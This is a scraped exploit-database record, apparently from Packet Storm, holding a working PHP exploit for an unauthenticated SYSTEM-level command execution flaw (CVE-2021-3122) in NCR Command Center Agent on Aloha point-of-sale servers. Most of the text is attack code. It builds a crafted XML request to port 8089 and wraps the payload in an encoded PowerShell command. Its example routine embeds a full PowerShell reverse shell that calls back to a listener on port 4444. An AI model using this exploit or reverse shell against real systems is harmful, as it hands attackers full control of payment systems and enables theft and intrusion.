{“lastseen”:”2026-02-04T17:30:27″,”description”:”Proof of concept exploit for a remote command execution vulnerability in NCR Command Center Agent version 16.3 on Aloha POS\/BOH servers. The vulnerability allows remote, unauthenticated attackers to execute arbitrary commands with SYSTEM privileges by…”,”published”:”2026-02-04T00:00:00″,”modified”:”2026-02-04T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 NCR Command Center Agent 16.3 Remote Command Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:214926″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2021-3122″],”sourceData”:”=============================================================================================================================================\\n | # Title : NCR Command Center Agent 16.3 RCE Exploit |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.2 (64 bits) |\\n | # Vendor : https:\/\/www.ncr.com\/ |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/211034\/ \\u0026\\tCVE-2021-3122\\n \\n [+] Summary : This PHP implementation provides a tool for testing the CVE-2021-3122 vulnerability in NCR Command Center Agent version 16.3 on Aloha POS\/BOH servers. \\n The vulnerability allows remote, unauthenticated attackers to execute arbitrary commands with SYSTEM privileges by sending a specially crafted XML document to port 8089.\\n \\t\\t\\t\\t \\n [+] POC : php poc.php\\n \\n \\u003c?php\\n \\n class NCRCommandCenterExploit {\\n private $rhost;\\n private $rport;\\n private $verbose;\\n private $timeout = 30;\\n \\n public function __construct($rhost, $rport = 8089, $verbose = false) {\\n $this-\\u003erhost = $rhost;\\n $this-\\u003erport = $rport;\\n $this-\\u003everbose = $verbose;\\n }\\n \\n \/**\\n * \u0627\u0644\u062a\u062d\u0642\u0642 \u0645\u0646 \u0648\u062c\u0648\u062f \u0627\u0644\u062e\u062f\u0645\u0629\\n *\/\\n public function check() {\\n try {\\n $socket = $this-\\u003econnect();\\n \\n \/\/ \u0645\u062d\u0627\u0648\u0644\u0629 \u0642\u0631\u0627\u0621\u0629 \u0627\u0644\u0628\u0646\u0631\\n $banner = $this-\\u003ereadSocket($socket, 1024);\\n $this-\\u003edisconnect($socket);\\n \\n if (strpos($banner, ‘\\u003ccmcsys:myNodeNumber’) !== false) {\\n return \\”Detected\\”;\\n }\\n \\n return \\”Safe\\”;\\n \\n } catch (Exception $e) {\\n return \\”Safe: \\” . $e-\\u003egetMessage();\\n }\\n }\\n \\n \/**\\n * \u0625\u0646\u0634\u0627\u0621 \u062d\u0645\u0648\u0644\u0629 XML\\n *\/\\n private function generateXml($cmdPayload) {\\n $workitem_id = rand(1, 9);\\n $source_node = rand(1, 9);\\n \\n $exec_statuses = [‘Unknown’, ‘Waiting’, ‘InProgress’];\\n $exec_status = $exec_statuses[array_rand($exec_statuses)];\\n \\n $dest_servers = [‘WebServer’, ‘RdfServer’];\\n $dest_server = $dest_servers[array_rand($dest_servers)];\\n \\n $guid = $this-\\u003egenerateGuid();\\n \\n $xml_body = ‘\\u003cworkitemroot commandname=\\”runCommand\\”\\u003e’;\\n $xml_body .= ‘\\u003cWorkItem\\u003e’;\\n $xml_body .= ‘\\u003cWorkItemId\\u003e’ . $workitem_id . ‘\\u003c\/WorkItemId\\u003e’;\\n $xml_body .= ‘\\u003cCommandName\\u003erunCommand\\u003c\/CommandName\\u003e’;\\n $xml_body .= ‘\\u003cSourceNode\\u003e’ . $source_node . ‘\\u003c\/SourceNode\\u003e’;\\n $xml_body .= ‘\\u003cTargetNode\\u003e0\\u003c\/TargetNode\\u003e’;\\n $xml_body .= ‘\\u003cStatus\\u003e’ . $exec_status . ‘\\u003c\/Status\\u003e’;\\n $xml_body .= ‘\\u003c\/WorkItem\\u003e’;\\n $xml_body .= ‘\\u003ccommand\\u003e’;\\n $xml_body .= ‘\\u003cArguments\\u003e’ . $cmdPayload . ‘\\u003c\/Arguments\\u003e’;\\n $xml_body .= ‘\\u003cGuid\\u003e’ . $guid . ‘\\u003c\/Guid\\u003e’;\\n $xml_body .= ‘\\u003cResult\\u003e\\u003c\/Result\\u003e’;\\n $xml_body .= ‘\\u003cdestserver\\u003e’ . $dest_server . ‘\\u003c\/destserver\\u003e’;\\n $xml_body .= ‘\\u003c\/command\\u003e’;\\n $xml_body .= ‘\\u003c\/workitemroot\\u003e’;\\n $xml_body .= ‘\\u003c:EOM:\\u003e’;\\n \\n return $xml_body;\\n }\\n \\n \/**\\n * \u062a\u0648\u0644\u064a\u062f GUID \u0639\u0634\u0648\u0627\u0626\u064a\\n *\/\\n private function generateGuid() {\\n if (function_exists(‘com_create_guid’) === true) {\\n return trim(com_create_guid(), ‘{}’);\\n }\\n \\n $data = random_bytes(16);\\n $data[6] = chr(ord($data[6]) \\u0026 0x0f | 0x40); \/\/ version 4\\n $data[8] = chr(ord($data[8]) \\u0026 0x3f | 0x80); \/\/ variant\\n \\n return vsprintf(‘%s%s-%s-%s-%s-%s%s%s’, str_split(bin2hex($data), 4));\\n }\\n \\n \/**\\n * \u0625\u0646\u0634\u0627\u0621 \u062d\u0645\u0648\u0644\u0629 PowerShell\\n *\/\\n private function createPowerShellPayload($encodedPayload) {\\n \/\/ \u062d\u0645\u0648\u0644\u0629 PowerShell \u0627\u0644\u0623\u0633\u0627\u0633\u064a\u0629\\n $payload = \\”powershell -exec bypass -enc \\” . $encodedPayload;\\n return $payload;\\n }\\n \\n \/**\\n * \u062a\u0634\u063a\u064a\u0644 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644\\n *\/\\n public function exploit($payload) {\\n try {\\n $socket = $this-\\u003econnect();\\n \\n if ($this-\\u003everbose) {\\n echo \\”[+] Connected to {$this-\\u003erhost}:{$this-\\u003erport}\\\\n\\”;\\n }\\n \\n \/\/ \u062a\u0631\u0645\u064a\u0632 \u0627\u0644\u062d\u0645\u0648\u0644\u0629 (\u064a\u0645\u0643\u0646 \u0627\u0633\u062a\u062e\u062f\u0627\u0645 base64 \u0647\u0646\u0627)\\n $encodedPayload = base64_encode($payload);\\n $cmdPayload = $this-\\u003ecreatePowerShellPayload($encodedPayload);\\n \\n \/\/ \u0625\u0646\u0634\u0627\u0621 XML\\n $payloadXml = $this-\\u003egenerateXml($cmdPayload);\\n \\n if ($this-\\u003everbose) {\\n echo \\”[*] Generated payload XML\\\\n\\”;\\n }\\n \\n \/\/ \u0625\u0631\u0633\u0627\u0644 \u0627\u0644\u062d\u0645\u0648\u0644\u0629\\n $this-\\u003ewriteSocket($socket, $payloadXml);\\n \\n if ($this-\\u003everbose) {\\n echo \\”[*] Payload sent\\\\n\\”;\\n echo \\”[*] Check your listener\\\\n\\”;\\n }\\n \\n \/\/ \u0642\u0631\u0627\u0621\u0629 \u0627\u0644\u0627\u0633\u062a\u062c\u0627\u0628\u0629 (\u0627\u062e\u062a\u064a\u0627\u0631\u064a)\\n $response = $this-\\u003ereadSocket($socket, 4096);\\n \\n $this-\\u003edisconnect($socket);\\n \\n return [\\n ‘success’ =\\u003e true,\\n ‘response’ =\\u003e $response\\n ];\\n \\n } catch (Exception $e) {\\n return [\\n ‘success’ =\\u003e false,\\n ‘error’ =\\u003e $e-\\u003egetMessage()\\n ];\\n }\\n }\\n \\n \/**\\n * \u0627\u0644\u0627\u062a\u0635\u0627\u0644 \u0628\u0627\u0644\u0647\u062f\u0641\\n *\/\\n private function connect() {\\n $socket = @fsockopen($this-\\u003erhost, $this-\\u003erport, $errno, $errstr, $this-\\u003etimeout);\\n \\n if (!$socket) {\\n throw new Exception(\\”Failed to connect: {$errstr} ({$errno})\\”);\\n }\\n \\n \/\/ \u062a\u0639\u064a\u064a\u0646 \u0645\u0647\u0644\u0629 \u0644\u0644\u0642\u0631\u0627\u0621\u0629\/\u0627\u0644\u0643\u062a\u0627\u0628\u0629\\n stream_set_timeout($socket, $this-\\u003etimeout);\\n \\n return $socket;\\n }\\n \\n \/**\\n * \u0643\u062a\u0627\u0628\u0629 \u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a \u0625\u0644\u0649 \u0627\u0644\u0633\u0648\u0643\u064a\u062a\\n *\/\\n private function writeSocket($socket, $data) {\\n $written = fwrite($socket, $data);\\n \\n if ($written === false) {\\n throw new Exception(\\”Failed to write to socket\\”);\\n }\\n \\n return $written;\\n }\\n \\n \/**\\n * \u0642\u0631\u0627\u0621\u0629 \u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a \u0645\u0646 \u0627\u0644\u0633\u0648\u0643\u064a\u062a\\n *\/\\n private function readSocket($socket, $length) {\\n $data = fread($socket, $length);\\n \\n if ($data === false) {\\n throw new Exception(\\”Failed to read from socket\\”);\\n }\\n \\n return $data;\\n }\\n \\n \/**\\n * \u0642\u0637\u0639 \u0627\u0644\u0627\u062a\u0635\u0627\u0644\\n *\/\\n private function disconnect($socket) {\\n if (is_resource($socket)) {\\n fclose($socket);\\n }\\n }\\n \\n \/**\\n * \u0645\u062b\u0627\u0644 \u0639\u0644\u0649 \u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0627\u0644\u0643\u0648\u062f\\n *\/\\n public static function exampleUsage() {\\n $target = \\”192.168.1.100\\”;\\n $port = 8089;\\n \\n $exploit = new self($target, $port, true);\\n \\n echo \\”[*] Checking target…\\\\n\\”;\\n $checkResult = $exploit-\\u003echeck();\\n echo \\”[*] Check result: {$checkResult}\\\\n\\”;\\n \\n if ($checkResult === \\”Detected\\”) {\\n \/\/ \u062d\u0645\u0648\u0644\u0629 PowerShell \u0639\u0643\u0633\u064a\u0629 \u0645\u062b\u0627\u0644\\n \/\/ \u064a\u0645\u0643\u0646\u0643 \u062a\u063a\u064a\u064a\u0631\u0647\u0627 \u062d\u0633\u0628 \u0627\u062d\u062a\u064a\u0627\u062c\u0627\u062a\u0643\\n $reverseShellPayload = ‘$client = New-Object System.Net.Sockets.TCPClient(\\”192.168.1.50\\”,4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2\\u003e\\u00261 | Out-String );$sendback2 = $sendback + \\”PS \\” + (pwd).Path + \\”\\u003e \\”;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()’;\\n \\n echo \\”[*] Executing exploit…\\\\n\\”;\\n $result = $exploit-\\u003eexploit($reverseShellPayload);\\n \\n if ($result[‘success’]) {\\n echo \\”[+] Exploit executed successfully\\\\n\\”;\\n if (!empty($result[‘response’])) {\\n echo \\”[+] Response: \\” . htmlspecialchars($result[‘response’]) . \\”\\\\n\\”;\\n }\\n } else {\\n echo \\”[-] Exploit failed: \\” . $result[‘error’] . \\”\\\\n\\”;\\n }\\n } else {\\n echo \\”[-] Target not vulnerable or service not detected\\\\n\\”;\\n }\\n }\\n }\\n \\n \/\/ \u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0627\u0644\u0643\u0648\u062f \u0645\u0646 \u0633\u0637\u0631 \u0627\u0644\u0623\u0648\u0627\u0645\u0631\\n if (php_sapi_name() === ‘cli’) {\\n $options = getopt(\\”h:p:v::\\”, [\\”help\\”, \\”check\\”, \\”exploit:\\”]);\\n \\n if (isset($options[‘h’]) || isset($options[‘help’])) {\\n echo \\”NCR Command Center Agent RCE Exploit (CVE-2021-3122)\\\\n\\”;\\n echo \\”Usage:\\\\n\\”;\\n echo \\” -h \\u003chost\\u003e Target host\\\\n\\”;\\n echo \\” -p \\u003cport\\u003e Target port (default: 8089)\\\\n\\”;\\n echo \\” -v Verbose mode\\\\n\\”;\\n echo \\” –check Check if target is vulnerable\\\\n\\”;\\n echo \\” –exploit \\u003cpayload\\u003e Execute exploit with payload\\\\n\\”;\\n echo \\”\\\\nExample:\\\\n\\”;\\n echo \\” php \\” . basename(__FILE__) . \\” -h 192.168.1.100 –check\\\\n\\”;\\n echo \\” php \\” . basename(__FILE__) . \\” -h 192.168.1.100 -v –exploit ‘whoami’\\\\n\\”;\\n exit(0);\\n }\\n \\n if (isset($options[‘h’])) {\\n $host = $options[‘h’];\\n $port = isset($options[‘p’]) ? $options[‘p’] : 8089;\\n $verbose = isset($options[‘v’]);\\n \\n $exploit = new NCRCommandCenterExploit($host, $port, $verbose);\\n \\n if (isset($options[‘check’])) {\\n $result = $exploit-\\u003echeck();\\n echo \\”Target: \\” . $host . \\”:\\” . $port . \\”\\\\n\\”;\\n echo \\”Status: \\” . $result . \\”\\\\n\\”;\\n }\\n \\n if (isset($options[‘exploit’])) {\\n $payload = $options[‘exploit’];\\n $result = $exploit-\\u003eexploit($payload);\\n \\n if ($result[‘success’]) {\\n echo \\”Exploit executed successfully!\\\\n\\”;\\n } else {\\n echo \\”Exploit failed: \\” . $result[‘error’] . \\”\\\\n\\”;\\n }\\n }\\n } else {\\n echo \\”Error: Target host is required. Use -h for help.\\\\n\\”;\\n }\\n }\\n \\n \/\/ \u0644\u0627\u062e\u062a\u0628\u0627\u0631 \u0627\u0644\u0643\u0648\u062f \u0645\u0628\u0627\u0634\u0631\u0629 (\u0625\u0644\u063a\u0627\u0621 \u0627\u0644\u062a\u0639\u0644\u064a\u0642 \u0644\u0644\u0627\u062e\u062a\u0628\u0627\u0631)\\n \/\/ NCRCommandCenterExploit::exampleUsage();\\n \\n ?\\u003e\\n \\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/214926″,”cvss”:{“score”:10,”severity”:”HIGH”,”vector”:”AV:N\/AC:L\/Au:N\/C:C\/I:C\/A:C”,”version”:”2.0″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/214926\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-02-04T17:30:27″,”description”:”Proof of concept exploit for a remote command execution vulnerability in NCR Command Center Agent version 16.3 on Aloha POS\/BOH servers. The vulnerability allows remote,…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,36,12,15,13,53,7,11,5],"class_list":["post-39068","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-100","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n